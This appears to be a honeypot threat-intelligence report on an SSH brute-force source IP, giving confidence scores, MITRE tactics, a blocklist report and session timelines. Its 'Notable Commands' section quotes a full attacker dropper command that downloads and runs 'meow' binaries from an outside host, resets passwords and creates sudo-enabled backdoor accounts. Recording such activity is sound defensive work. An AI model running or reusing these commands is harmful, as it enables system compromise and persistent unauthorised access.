
34.11.41.120

TAGGED SUSPICIOUS
Threat Confidence
57%
Location
🇺🇸 US / Washington
ASN
AS396982 · Google LLC
Cloud Provider
Total Events
108
Above average by volume
Agent Count
1
First / Last Seen
2026-05-31 13:23 — 2026-05-31 13:25
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Execution
Defense Evasion
Credential Access
Discovery
Command and Control
External Corroboration
Blocklist.de
Reported 2026-05-31 14:02
blocklist_de:reported
Session Forensics
scanner ×2 malware_dropper ×1 credential_probe ×13
Sessions
16 (1 with login)
Avg Depth Score
0.24
Commands Executed
26
Files Downloaded
1
Notable Commands
  • echo 'qwerty' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):qwerty > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):qwerty > /tmp/mew)
  • whoami
  • cd /tmp
  • ulimit -n 1020000
  • rm -rf meow*
  • wget http://34.11.136.102/meow
  • curl -O http://34.11.136.102/meow
  • chmod 777 meow
  • ./meow
Fingerprints
SSH-2.0-Go
Evidence Timeline
Credential Probe 1fae89162573 newark_01 · 2026-05-31 13:23
1 20%
Malware Dropper c24233630af3 newark_01 · 2026-05-31 13:23
26 1 1 100%
Credential Probe 22888cf52e9f newark_01 · 2026-05-31 13:23
1 20%
Credential Probe cfe7b20a4134 newark_01 · 2026-05-31 13:23
1 20%
Credential Probe 9383c6437157 newark_01 · 2026-05-31 13:23
1 20%
Credential Probe e56cc28d0242 newark_01 · 2026-05-31 13:23
1 20%
Credential Probe 975692ec1531 newark_01 · 2026-05-31 13:23
1 20%
Credential Probe dca499b4b7ab newark_01 · 2026-05-31 13:23
1 20%
Credential Probe a8ec2314b5bf newark_01 · 2026-05-31 13:23
1 20%
Credential Probe 38ac40fb54b3 newark_01 · 2026-05-31 13:23
1 20%
Credential Probe d2ef9f01edbb newark_01 · 2026-05-31 13:23
1 20%
Credential Probe b7272f8d423f newark_01 · 2026-05-31 13:23
1 20%
Credential Probe 2ad3967a4335 newark_01 · 2026-05-31 13:23
1 20%
Credential Probe e8943bb4aca0 newark_01 · 2026-05-31 13:23
1 20%
Scanner e75fcf2d6298 newark_01 · 2026-05-31 13:23
15%
Scanner 61332a346e42 newark_01 · 2026-05-31 13:23
15%